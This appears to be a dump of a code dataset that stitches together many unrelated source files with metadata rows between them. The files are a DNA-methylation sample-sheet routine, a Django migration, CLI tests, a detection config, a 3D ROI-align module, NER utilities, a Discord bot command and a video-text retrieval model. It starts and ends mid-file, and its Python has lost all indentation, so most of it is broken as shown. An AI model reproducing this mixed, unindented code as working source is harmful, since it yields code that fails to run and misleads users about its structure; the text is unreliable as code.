loaded_files['meta'] = loaded_files['meta'].set_index('Sample_ID')
elif 'Sentrix_ID' in loaded_files['meta'].columns and 'Sentrix_Position' in loaded_files['meta'].columns:
loaded_files['meta']['Sample_ID'] = loaded_files['meta']['Sentrix_ID'].astype(str) + '_' + loaded_files['meta']['Sentrix_Position'].astype(str)
loaded_files['meta'] = loaded_files['meta'].set_index('Sample_ID')
else:
raise ValueError("Your sample sheet must have a Sample_ID column, or (Sentrix_ID and Sentrix_Position) columns.")
# fixing case of the relevant column
renamed_column = None
if ('Gender' in loaded_files['meta'].columns or 'Sex' in loaded_files['meta'].columns):
if 'Gender' in loaded_files['meta'].columns:
renamed_column = 'Gender'
elif 'Sex' in loaded_files['meta'].columns:
renamed_column = 'Sex'
else:
renamed_columns = {col:(col.title() if col.lower() in ('sex','gender') else col) for col in loaded_files['meta'].columns}
loaded_files['meta'] = loaded_files['meta'].rename(columns=renamed_columns)
if 'Gender' in renamed_columns.values():
renamed_column = 'Gender'
elif 'Sex' in renamed_columns.values():
renamed_column = 'Sex'
if renamed_column is not None:
# next, ensure samplesheet Sex/Gender (Male/Female) are recoded as M/F; controls_report() does NOT do this step, but should.
sex_values = set(loaded_files['meta'][renamed_column].unique())
#print('sex_values', sex_values)
if not sex_values.issubset(set(['M','F'])): # subset, because samples might only contain one sex
if 'Male' in sex_values or 'Female' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'Male':'M', 'Female':'F'})
elif 'male' in sex_values or 'female' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'male':'M', 'female':'F'})
elif 'MALE' in sex_values or 'FEMALE' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'MALE':'M', 'FEMALE':'F'})
elif 'm' in sex_values or 'f' in sex_values:
loaded_files['meta'][renamed_column] = loaded_files['meta'][renamed_column].map({'m':'M', 'f':'F'})
else:
raise ValueError(f"Cannot compare with predicted sex because actual sexes listed in your samplesheet are not understood (expecting M or F): (found {sex_values})")
output['actual_sex'] = None
output['sex_matches'] = None
for row in output.itertuples():
try:
actual_sex = str(loaded_files['meta'].loc[row.Index].get(renamed_column))
except KeyError:
if 'Sample_ID' in output.columns:
LOGGER.warning("Sample_ID was another column in your output DataFrame; Set that to the index when you pass it in.")
raise KeyError("Could not read actual sex from meta data to compare.")
if isinstance(actual_sex, pd.Series):
LOGGER.warning(f"Multiple samples matched actual sex for {row.Index}, because Sample_ID repeats in sample sheets. Only using first match, so matches may not be accurate.")
actual_sex = actual_sex[0]
if hasattr(row,'predicted_sex'):
sex_matches = 1 if actual_sex.upper() == str(row.predicted_sex).upper() else 0
else:
sex_matches = np.nan
output.loc[row.Index, 'actual_sex'] = actual_sex
output.loc[row.Index, 'sex_matches'] = sex_matches
else:
pass # no Sex/Gender column found in samplesheet
return output
| 53.583979 | 191 | 0.672711 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9,610 | 0.463423 |
6a15c95427effad3d19c61b8dfdb12b52e2999fa | 649 | py | Python | backend/accounts/migrations/0003_auto_20201115_1537.py | mahmoud-batman/quizz-app | bebeff8d055ea769773cd1c749f42408aa83f5b9 | [
"MIT"
] | null | null | null | backend/accounts/migrations/0003_auto_20201115_1537.py | mahmoud-batman/quizz-app | bebeff8d055ea769773cd1c749f42408aa83f5b9 | [
"MIT"
] | null | null | null | backend/accounts/migrations/0003_auto_20201115_1537.py | mahmoud-batman/quizz-app | bebeff8d055ea769773cd1c749f42408aa83f5b9 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-11-15 15:37
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_auto_20201115_1531'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='user_id',
field=models.IntegerField(blank=True, null=True, unique=True, validators=[django.core.validators.MaxValueValidator(99999), django.core.validators.MinValueValidator(10000), django.core.validators.MinLengthValidator(5), django.core.validators.MaxLengthValidator(5)]),
),
]
| 32.45 | 277 | 0.697997 | 526 | 0.810478 | 0 | 0 | 0 | 0 | 0 | 0 | 103 | 0.158706 |
6a164cca97745158870c1da7ad0a330912380e28 | 2,504 | py | Python | tests/test_basics.py | sirosen/git-fortune | 69ef3e18506aa67fdc812854f1588828ea4e7448 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/test_basics.py | sirosen/git-fortune | 69ef3e18506aa67fdc812854f1588828ea4e7448 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/test_basics.py | sirosen/git-fortune | 69ef3e18506aa67fdc812854f1588828ea4e7448 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import subprocess
from git_fortune._compat import fix_line_endings
from git_fortune.version import __version__
def test_help(capfd):
subprocess.check_call(["git-fortune", "-h"])
captured = capfd.readouterr()
assert (
fix_line_endings(
"""
A fortune-like command for showing git tips
Invoke it as 'git-fortune' or 'git fortune'
"""
)
in captured.out
)
def test_version(capfd):
subprocess.check_call(["git-fortune", "--version"])
captured = capfd.readouterr()
assert "git-fortune {}".format(__version__) in captured.out
def test_tip_boxformat(capfd):
subprocess.check_call(["git-fortune", "--id", "3"])
tip3boxbody = fix_line_endings(
"""\
+-------------------------------------------------------------------------------+
| GIT TIP #3 |
| |
| `git log --graph` can show you a tree-like representation of the git history. |
| |
| Try adding in `--oneline --decorate --all`. |
| |
+-------------------------------------------------------------------------------+
"""
)
captured = capfd.readouterr()
assert captured.out == tip3boxbody
def test_tip_plainformat(capfd):
subprocess.check_call(["git-fortune", "--format", "plain", "--id", "1"])
tip1plainbody = fix_line_endings(
"Modify your last commit before pushing with `git commit --amend`.\n"
)
captured = capfd.readouterr()
assert captured.out == tip1plainbody
def test_noargs(capfd):
"""just make sure it doesn't crashfail"""
subprocess.check_call(["git-fortune"])
captured = capfd.readouterr()
assert "GIT TIP #" in captured.out # from the box format
def test_category(capfd):
"""just make sure it doesn't crashfail"""
subprocess.check_call(["git-fortune", "--category", "diff"])
captured = capfd.readouterr()
assert "GIT TIP #" in captured.out # from the box format
def test_category_and_id_mutex(capfd):
ret = subprocess.call(["git-fortune", "--category", "diff", "--id", "3"])
assert ret == 2
captured = capfd.readouterr()
assert "" == captured.out
assert "argument --id: not allowed with argument --category" in captured.err
| 33.386667 | 81 | 0.527157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,232 | 0.492013 |
6a167dd5d92960139223aa44954c2cb6cacf4375 | 2,487 | py | Python | configs/keypoints/faster_rcnn_r50_fpn_keypoints.py | VGrondin/CBNetV2_mask_remote | b27246af5081d5395db3c3105d32226de05fcd13 | [
"Apache-2.0"
] | null | null | null | configs/keypoints/faster_rcnn_r50_fpn_keypoints.py | VGrondin/CBNetV2_mask_remote | b27246af5081d5395db3c3105d32226de05fcd13 | [
"Apache-2.0"
] | null | null | null | configs/keypoints/faster_rcnn_r50_fpn_keypoints.py | VGrondin/CBNetV2_mask_remote | b27246af5081d5395db3c3105d32226de05fcd13 | [
"Apache-2.0"
] | null | null | null | _base_ = [
'../_base_/models/faster_rcnn_r50_fpn.py'
]
model = dict(
type='FasterRCNN',
# pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
scales=[8],
ratios=[0.5, 1.0, 2.0],
strides=[4, 8, 16, 32, 64]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)),
roi_head=dict(
# type='StandardRoIHead',
_delete_=True,
type='KeypointRoIHead',
output_heatmaps=False,
# keypoint_head=dict(
# type='HRNetKeypointHead',
# num_convs=8,
# in_channels=256,
# features_size=[256, 256, 256, 256],
# conv_out_channels=512,
# num_keypoints=5,
# loss_keypoint=dict(type='MSELoss', loss_weight=50.0)),
keypoint_decoder=dict(type='HeatmapDecodeOneKeypoint', upscale=4),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='Shared2FCBBoxHead',
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)))
)
#optimizer = dict(lr=0.002)
#lr_config = dict(step=[40, 55])
#total_epochs = 60
| 32.298701 | 77 | 0.542421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 672 | 0.270205 |
6a168cae49b57ce434a41c7070da071ca4734fc0 | 3,232 | py | Python | maskrcnn_benchmark/layers/roi_align_rotated_3d.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | 2 | 2020-03-05T06:39:03.000Z | 2020-03-31T12:08:04.000Z | maskrcnn_benchmark/layers/roi_align_rotated_3d.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | null | null | null | maskrcnn_benchmark/layers/roi_align_rotated_3d.py | picwoon/As_built_BIM | 9e6b81e2fd8904f5afd013e21d2db45456c138d5 | [
"MIT"
] | 1 | 2021-09-24T13:17:40.000Z | 2021-09-24T13:17:40.000Z | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch, math
from torch import nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from SparseConvNet.sparseconvnet.tools_3d_2d import sparse_3d_to_dense_2d
import _C
class _ROIAlignRotated3D(Function):
@staticmethod
def forward(ctx, input, roi, output_size, spatial_scale, sampling_ratio):
ctx.save_for_backward(roi)
ctx.output_size = _pair(output_size)
ctx.spatial_scale = spatial_scale
ctx.sampling_ratio = sampling_ratio
ctx.input_shape = input.size()
# input: [4, 256, 304, 200, 7]
# roi: [171, 8]
# spatial_scale: 0.25
# output_size: [7,7,7]
# sampling_ratio: 2
output = _C.roi_align_rotated_3d_forward(
input, roi, spatial_scale, output_size[0], output_size[1], output_size[2], sampling_ratio
) # [171, 256, 7, 7]
return output
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
rois, = ctx.saved_tensors
output_size = ctx.output_size
spatial_scale = ctx.spatial_scale
sampling_ratio = ctx.sampling_ratio
bs, ch, h, w, zsize = ctx.input_shape
grad_input = _C.roi_align_rotated_3d_backward(
grad_output,
rois,
spatial_scale,
output_size[0],
output_size[1],
output_size[2],
bs,
ch,
h,
w,
zsize,
sampling_ratio,
)
return grad_input, None, None, None, None
roi_align_rotated_3d = _ROIAlignRotated3D.apply
class ROIAlignRotated3D(nn.Module):
def __init__(self, output_size, spatial_scale, sampling_ratio):
'''
output_size:[pooled_height, pooled_width]
spatial_scale: size_of_map/size_of_original_image
sampling_ratio: how many points to use for bilinear_interpolate
'''
super(ROIAlignRotated3D, self).__init__()
self.output_size = output_size # (7,7,7)
self.spatial_scale = spatial_scale # 0.25
self.sampling_ratio = sampling_ratio # 2
def forward(self, input_s3d, rois_3d):
'''
input0: sparse 3d tensor
rois_3d: 3d box, xyz order is same as input0,
yaw unit is rad, anti-clock wise is positive
input: [batch_size, feature, h, w]
rois: [n,5] [batch_ind, center_w, center_h, roi_width, roi_height, theta]
theta unit: degree, anti-clock wise is positive
Note: the order of w and h inside of input and rois is different.
'''
input_d3d = sparse_3d_to_dense_2d(input_s3d)
output = roi_align_rotated_3d(
input_d3d, rois_3d, self.output_size, self.spatial_scale, self.sampling_ratio
)
return output
def __repr__(self):
tmpstr = self.__class__.__name__ + "("
tmpstr += "output_size=" + str(self.output_size)
tmpstr += ", spatial_scale=" + str(self.spatial_scale)
tmpstr += ", sampling_ratio=" + str(self.sampling_ratio)
tmpstr += ")"
return tmpstr
| 34.021053 | 101 | 0.63552 | 2,846 | 0.880569 | 0 | 0 | 1,307 | 0.404394 | 0 | 0 | 886 | 0.274134 |
6a16ef74b6b87e7acddaab1f4ea03a7e48da5422 | 8,360 | py | Python | src/model/utils/utils.py | J-CITY/METADATA-EXTRACTOR | 6bc01a7e4b74a3156c07efc2c80d5519c325dd53 | [
"Apache-2.0"
] | null | null | null | src/model/utils/utils.py | J-CITY/METADATA-EXTRACTOR | 6bc01a7e4b74a3156c07efc2c80d5519c325dd53 | [
"Apache-2.0"
] | null | null | null | src/model/utils/utils.py | J-CITY/METADATA-EXTRACTOR | 6bc01a7e4b74a3156c07efc2c80d5519c325dd53 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
from .logger import printLog
UNK = "$UNK$"
NUM = "$NUM$"
NONE = "O"
class ParrotIOError(Exception):
def __init__(self, filename):
message = "ERROR: Can not find file {}.".format(filename)
super(ParrotIOError, self).__init__(message)
# Class that iterates over CoNLL Dataset
class CoNLLDataset(object):
def __init__(self, filename, processingWord=None, processingTag=None,
maxIter=None):
self.filename = filename
self.processingWord = processingWord # function that takes a word as input
self.processingTag = processingTag # function that takes a tag as input
self.maxIter = maxIter # max number of sentences to yield
self.length = None
def __iter__(self):
niter = 0
with open(self.filename, encoding='utf-8') as f:
words, tags = [], []
for line in f:
line = line.strip() # delete spaces in start and end
if (len(line) == 0 or line.startswith("-DOCSTART-")):
if len(words) != 0:
niter += 1
if self.maxIter is not None and niter > self.maxIter:
break
yield words, tags
words, tags = [], []
else:
ls = line.split(' ')
word, tag = ls[0],ls[-1]
if self.processingWord is not None:
word = self.processingWord(word)
if self.processingTag is not None:
tag = self.processingTag(tag)
words += [word]
tags += [tag]
def __len__(self):
if self.length is None:
self.length = 0
for _ in self:
self.length += 1
return self.length
#Create a dictionary from dataset
def getDictionary(datasets):
printLog("Building dictionary: ")
dictWords = set()
dictTags = set()
for dataset in datasets:
for words, tags in dataset:
dictWords.update(words)
dictTags.update(tags)
printLog("DONE: " + str(len(dictWords)) + " size")
return dictWords, dictTags
def getCharDictionary(dataset):
dictChar = set()
for words, _ in dataset:
for word in words:
dictChar.update(word)
return dictChar
#filename - path wo file with vectors
def getGloveDictionary(filename):
printLog("Building dictionary")
dictGlove = set()
with open(filename, encoding='utf-8') as f:
for line in f:
word = line.strip().split(' ')[0]
dictGlove.add(word)
printLog("DONE: "+ str(len(dictGlove)) +" tokens")
return dictGlove
def saveDictionary(dictionary, filename):
printLog("SAVE")
with open(filename, "w", encoding='utf-8') as f:
for i, word in enumerate(dictionary):
if i != len(dictionary) - 1:
f.write("{}\n".format(word))
else:
f.write(word)
def loadDictionary(filename):
try:
d = dict()
with open(filename, encoding='utf-8') as f:
for idx, word in enumerate(f):
word = word.strip()
d[word] = idx
except IOError:
raise ParrotIOError(filename)
return d
def exportCompactGloveVectors(dictionary, gloveFilename, trimmedFilename, dim):
embeddings = np.zeros([len(dictionary), dim])
with open(gloveFilename, encoding='utf-8') as f:
for line in f:
line = line.strip().split(' ')
word = line[0]
if word in dictionary:
embedding = [float(x) for x in line[1:]] #glove coords
wordID = dictionary[word]
embeddings[wordID] = np.asarray(embedding)
np.savez_compressed(trimmedFilename, embeddings=embeddings) # store glove matrix
def getCompactGloveVectors(filename):
try:
with np.load(filename) as data:
return data["embeddings"]
except IOError:
raise ParrotIOError(filename)
def getProcessingWord(dictWords=None, dictChars=None,
lowercase=False, chars=False, allowUNK=True):
def f(word):
# char ids for word
if (dictChars is not None) and (chars == True):
charIDs = []
for char in word:
if (char in dictChars):
charIDs.append(dictChars[char])
if lowercase:
word = word.lower()
if word.isdigit():
word = NUM
# word id
if (dictWords is not None):
if word in dictWords:
word = dictWords[word]
elif allowUNK:
word = dictWords[UNK]
else:
raise Exception("Unknow tag.")
if (dictChars is not None) and (chars == True):
# chars ids and word id
return charIDs, word
# word id
return word
return f
def _padSequences(sequences, padtok, maxLength):
sequencePadded, sequenceLength = [], []
for seq in sequences:
seq = list(seq)
seq_ = seq[:maxLength] + [padtok]*max(maxLength - len(seq), 0)
sequencePadded += [seq_]
sequenceLength += [min(len(seq), maxLength)]
# all sublist have same length
return sequencePadded, sequenceLength
def padSequences(sequences, padtok, nlevels=1):
if nlevels == 1:
maxLength = max(map(lambda x : len(x), sequences))
sequencePadded, sequenceLength = _padSequences(sequences,
padtok, maxLength)
elif nlevels == 2:
maxLengthWord = max([max(map(lambda x: len(x), seq))
for seq in sequences])
sequencePadded, sequenceLength = [], []
for seq in sequences:
# all words are same length
sp, sl = _padSequences(seq, padtok, maxLengthWord)
sequencePadded += [sp]
sequenceLength += [sl]
maxLengthSentence = max(map(lambda x : len(x), sequences))
sequencePadded, _ = _padSequences(sequencePadded,
[padtok]*maxLengthWord, maxLengthSentence)
sequenceLength, _ = _padSequences(sequenceLength, 0,
maxLengthSentence)
return sequencePadded, sequenceLength
def minibatches(data, minibatchSize):
x_batch, y_batch = [], []
for (x, y) in data:
if len(x_batch) == minibatchSize:
yield x_batch, y_batch
x_batch, y_batch = [], []
if type(x[0]) == tuple:
x = zip(*x)
x_batch += [x]
y_batch += [y]
if len(x_batch) != 0:
yield x_batch, y_batch
def getChunkType(tok, idxToTag):
tagName = idxToTag[tok]
tagClass = tagName.split('-')[0]
tagType = tagName.split('-')[-1]
return tagClass, tagType
def getChunks(seq, tags):
"""Given a sequence of tags, group entities and their position
Args:
seq: [4, 4, 0, 0, ...] sequence of labels
tags: dict["O"] = 4
Returns:
list of (chunkType, chunkStart, chunkEnd)
Example:
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3}
result = [("PER", 0, 2), ("LOC", 3, 4)]
"""
default = tags[NONE]
idxToTag = {idx: tag for tag, idx in tags.items()}
chunks = []
chunkType, chunkStart = None, None
for i, tok in enumerate(seq):
# End of a chunk 1
if tok == default and chunkType is not None:
# Add a chunk.
chunk = (chunkType, chunkStart, i)
chunks.append(chunk)
chunkType, chunkStart = None, None
# End of a chunk + start of a chunk!
elif tok != default:
tokChunkClass, tokChunkType = getChunkType(tok, idxToTag)
if chunkType is None:
chunkType, chunkStart = tokChunkType, i
elif tokChunkType != chunkType or tokChunkClass == "B":
chunk = (chunkType, chunkStart, i)
chunks.append(chunk)
chunkType, chunkStart = tokChunkType, i
else:
pass
# end condition
if chunkType is not None:
chunk = (chunkType, chunkStart, len(seq))
chunks.append(chunk)
return chunks
| 32.784314 | 84 | 0.55323 | 1,767 | 0.211364 | 1,334 | 0.159569 | 0 | 0 | 0 | 0 | 1,071 | 0.12811 |
6a1710262c6a5f82f36fe3fcc5a0ae77374c7e1e | 148 | py | Python | noxfile.py | fatcat2/biggestContributor | 02f85fc072c460573af8eb6f0f6dcd3a9488af14 | [
"MIT"
] | 2 | 2018-03-15T14:39:53.000Z | 2018-03-15T20:34:14.000Z | noxfile.py | fatcat2/biggestContributor | 02f85fc072c460573af8eb6f0f6dcd3a9488af14 | [
"MIT"
] | 6 | 2018-03-16T15:43:27.000Z | 2020-05-19T19:42:32.000Z | noxfile.py | fatcat2/biggestContributor | 02f85fc072c460573af8eb6f0f6dcd3a9488af14 | [
"MIT"
] | 3 | 2018-03-16T15:36:57.000Z | 2020-05-19T19:34:47.000Z | import nox
FILE_PATHS = ["utils", "main.py"]
@nox.session
def format(session):
session.install("black")
session.run("black", *FILE_PATHS)
| 16.444444 | 37 | 0.675676 | 0 | 0 | 0 | 0 | 100 | 0.675676 | 0 | 0 | 30 | 0.202703 |
6a177f73dcbbd6c1d2721285cc1b7c72b4784fb1 | 2,781 | py | Python | discordbot/economy/currencies.py | minhhoang1023/GamestonkTerminal | 195dc19b491052df080178c0cc6a9d535a91a704 | [
"MIT"
] | 1 | 2022-02-18T04:02:52.000Z | 2022-02-18T04:02:52.000Z | discordbot/economy/currencies.py | minhhoang1023/GamestonkTerminal | 195dc19b491052df080178c0cc6a9d535a91a704 | [
"MIT"
] | null | null | null | discordbot/economy/currencies.py | minhhoang1023/GamestonkTerminal | 195dc19b491052df080178c0cc6a9d535a91a704 | [
"MIT"
] | null | null | null | import os
import df2img
import disnake
import pandas as pd
from PIL import Image
import discordbot.config_discordbot as cfg
from discordbot.config_discordbot import logger
from discordbot.helpers import autocrop_image
from gamestonk_terminal.economy import wsj_model
async def currencies_command(ctx):
"""Currencies overview [Wall St. Journal]"""
try:
# Debug user input
if cfg.DEBUG:
logger.debug("econ-currencies")
# Retrieve data
df = wsj_model.global_currencies()
df = pd.DataFrame.from_dict(df)
# Check for argument
if df.empty:
raise Exception("No available data found")
df["Last"] = pd.to_numeric(df["Last"].astype(float))
df["Chng"] = pd.to_numeric(df["Chng"].astype(float))
df["%Chng"] = pd.to_numeric(df["%Chng"].astype(float))
formats = {"Last": "{:.2f}", "Chng": "{:.2f}", "%Chng": "{:.2f}%"}
for col, value in formats.items():
df[col] = df[col].map(lambda x: value.format(x)) # pylint: disable=W0640
df = df.fillna("")
df.set_index(" ", inplace=True)
# Debug user output
if cfg.DEBUG:
logger.debug(df.to_string())
df = df[
[
"Last",
"Chng",
"%Chng",
]
]
dindex = len(df.index)
fig = df2img.plot_dataframe(
df,
fig_size=(800, (40 + (40 * dindex))),
col_width=[8, 3, 3],
tbl_cells=dict(
align="left",
height=35,
),
template="plotly_dark",
font=dict(
family="Consolas",
size=20,
),
paper_bgcolor="rgba(0, 0, 0, 0)",
)
imagefile = "econ-currencies.png"
df2img.save_dataframe(fig=fig, filename=imagefile)
image = Image.open(imagefile)
image = autocrop_image(image, 0)
image.save(imagefile, "PNG", quality=100)
image = disnake.File(imagefile)
title = "Economy: [WSJ] Currencies"
embed = disnake.Embed(title=title, colour=cfg.COLOR)
embed.set_image(url=f"attachment://{imagefile}")
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
os.remove(imagefile)
await ctx.send(embed=embed, file=image)
except Exception as e:
embed = disnake.Embed(
title="ERROR Economy: [WSJ] Currencies",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed, delete_after=30.0)
| 27.81 | 85 | 0.54297 | 0 | 0 | 0 | 0 | 0 | 0 | 2,509 | 0.902193 | 447 | 0.160734 |
6a17d1c656acfd1f8102ff27381a0764e4f0a027 | 3,276 | py | Python | aiovectortiler/config_handler.py | shongololo/aiovectortiler | cfd0008d5ac05baee52a24264f991946324f5a42 | [
"MIT"
] | 4 | 2016-07-24T20:39:40.000Z | 2018-12-26T06:43:35.000Z | aiovectortiler/config_handler.py | songololo/aiovectortiler | cfd0008d5ac05baee52a24264f991946324f5a42 | [
"MIT"
] | 7 | 2016-08-10T16:27:39.000Z | 2018-10-13T13:16:24.000Z | aiovectortiler/config_handler.py | songololo/aiovectortiler | cfd0008d5ac05baee52a24264f991946324f5a42 | [
"MIT"
] | 3 | 2016-08-09T03:12:24.000Z | 2016-11-08T01:17:29.000Z | import os
import yaml
import logging
logger = logging.getLogger(__name__)
class Configs:
server = None
recipes = {}
DB = None
plugins = None
@classmethod
def init_server_configs(cls, server_configs):
with open(server_configs) as s_c:
cls.server = yaml.load(s_c.read())
@classmethod
def init_layer_recipes(cls, recipe_configs):
recipe_name = None
if '/' in recipe_configs:
recipe_name = os.path.normpath(recipe_configs).split('/')[-1]
# for windows
elif '\\' in recipe_configs:
recipe_name = os.path.normpath(recipe_configs).split('\\')[-1]
if recipe_name[-4:] == '.yml':
recipe_name = recipe_name[:-4]
elif recipe_name[-5:] == '.yaml':
recipe_name = recipe_name[:-5]
else:
raise FileExistsError('File in layer recipes folder does not have a YAML extension: {0}'.format(recipe_configs))
with open(recipe_configs) as r_c:
load_recipe = yaml.load(r_c.read())
cls.recipes[recipe_name] = Recipe(load_recipe)
# add the recipe name based on the file name
# this is needed by the tilejson query
cls.recipes[recipe_name].name = recipe_name
logger.info('Adding layer: {0}'.format(recipe_name))
'''
Plugins.load()
Plugins.hook('before_load', config=Configs)
def load_recipe(data):
name = data.get('name', 'default')
if name in RECIPES:
raise ValueError('Recipe with name {} already exist'.format(name))
data['name'] = name
RECIPES[name] = Recipe(data)
if len(RECIPES) == 1 and name != 'default':
RECIPES['default'] = RECIPES[data['name']]
for recipe in Configs.layers:
with Path(recipe).open() as f:
load_recipe(yaml.load(f.read()))
Plugins.hook('load', config=config, recipes=RECIPES)
'''
# the following model structures for recipes / layers / queries allows searching up the chain
# for attributes. If not found in the root recipes level then it will check the server configs.
class Recipe(dict):
def __init__(self, data):
super().__init__(data)
self.load_layers(data['layers'])
def load_layers(self, layers):
self.layers = {}
for layer in layers:
self.layers[layer['name']] = Layer(self, layer)
def __getattr__(self, attr):
return self.get(attr, Configs.server.get(attr, None))
class Layer(dict):
def __init__(self, recipe, layer_data):
self.recipe = recipe
super().__init__(layer_data)
self.load_queries(layer_data['queries'])
def load_queries(self, queries):
self.queries = []
for query in queries:
self.queries.append(Query(self, query))
def __getattr__(self, attr):
return self.get(attr, getattr(self.recipe, attr))
@property
def id(self):
return '{0}:{1}'.format(self.recipe.name, self.name)
@property
def description(self):
return self.get('description', 'no description provided')
class Query(dict):
def __init__(self, layer, data):
self.layer = layer
super().__init__(data)
def __getattr__(self, attr):
return self.get(attr, getattr(self.layer, attr))
| 28.99115 | 124 | 0.626984 | 2,451 | 0.748168 | 0 | 0 | 1,355 | 0.413614 | 0 | 0 | 1,012 | 0.308913 |
6a17dd33b700261e4940d552334d981b6c74eaed | 128 | py | Python | volksdep/converters/__init__.py | repoww/volksdep | ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290 | [
"Apache-2.0"
] | 271 | 2020-05-22T11:05:19.000Z | 2022-02-27T13:57:38.000Z | volksdep/converters/__init__.py | repoww/volksdep | ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290 | [
"Apache-2.0"
] | 16 | 2020-06-28T09:54:07.000Z | 2022-01-18T09:08:07.000Z | volksdep/converters/__init__.py | repoww/volksdep | ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290 | [
"Apache-2.0"
] | 34 | 2020-05-22T11:08:29.000Z | 2021-12-18T22:47:06.000Z | from .torch2onnx import torch2onnx
from .onnx2trt import onnx2trt
from .torch2trt import torch2trt
from .base import load, save
| 25.6 | 34 | 0.828125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
6a17e7c4a91ac2e9483c7bdc29806cbac3d7a40c | 13,237 | py | Python | t2vretrieval/models/mlmatch.py | Roc-Ng/HANet | e679703e9e725205424d87f750358fb4f62ceec5 | [
"MIT"
] | 34 | 2021-07-26T12:22:05.000Z | 2022-03-08T03:49:33.000Z | t2vretrieval/models/mlmatch.py | hexiangteng/HANet | 31d37ccad9c56ff9422cb4eb9d32e79e7b9bc831 | [
"MIT"
] | null | null | null | t2vretrieval/models/mlmatch.py | hexiangteng/HANet | 31d37ccad9c56ff9422cb4eb9d32e79e7b9bc831 | [
"MIT"
] | 3 | 2021-08-03T06:00:26.000Z | 2021-12-27T03:26:12.000Z | import numpy as np
import torch
import framework.ops
import t2vretrieval.encoders.mlsent
import t2vretrieval.encoders.mlvideo
import t2vretrieval.models.globalmatch
from t2vretrieval.models.criterion import cosine_sim
from t2vretrieval.models.globalmatch import VISENC, TXTENC
class RoleGraphMatchModelConfig(t2vretrieval.models.globalmatch.GlobalMatchModelConfig):
def __init__(self):
super().__init__()
self.num_verbs = 4
self.num_nouns = 6
self.attn_fusion = 'embed' # sim, embed
self.simattn_sigma = 4
self.hard_topk = 1
self.max_violation = True
self.loss_weights = None
## this config will be covered by model.json due to the functions of load and load_from_dict
self.subcfgs[VISENC] = t2vretrieval.encoders.mlvideo.MultilevelEncoderConfig()
self.subcfgs[TXTENC] = t2vretrieval.encoders.mlsent.RoleGraphEncoderConfig()
class RoleGraphMatchModel(t2vretrieval.models.globalmatch.GlobalMatchModel):
def build_submods(self):
return {
VISENC: t2vretrieval.encoders.mlvideo.MultilevelEncoder(self.config.subcfgs[VISENC]),
TXTENC: t2vretrieval.encoders.mlsent.RoleGraphEncoder(self.config.subcfgs[TXTENC])
}
def forward_video_embed(self, batch_data):
vid_fts = torch.FloatTensor(batch_data['attn_fts']).to(self.device)
vid_lens = torch.LongTensor(batch_data['attn_lens']).to(self.device)
# (batch, max_vis_len, dim_embed)
vid_sent_embeds, vid_verb_embeds, vid_noun_embeds, local_sent_embeds, logits, max_len = self.submods[VISENC](vid_fts, vid_lens)
return {
'vid_sent_embeds': vid_sent_embeds,
'vid_verb_embeds': vid_verb_embeds,
'vid_noun_embeds': vid_noun_embeds,
'local_vid_embeds': local_sent_embeds,
'vid_lens': vid_lens,
'max_len': max_len,
'logits': logits,
}
def forward_text_embed(self, batch_data):
sent_ids = torch.LongTensor(batch_data['sent_ids']).to(self.device) ## sentence
sent_lens = torch.LongTensor(batch_data['sent_lens']).to(self.device) ## length
verb_masks = torch.BoolTensor(batch_data['verb_masks']).to(self.device) ## batch*nv*max_sen_len
noun_masks = torch.BoolTensor(batch_data['noun_masks']).to(self.device)
node_roles = torch.LongTensor(batch_data['node_roles']).to(self.device) ## batch*(n_v+n_n)
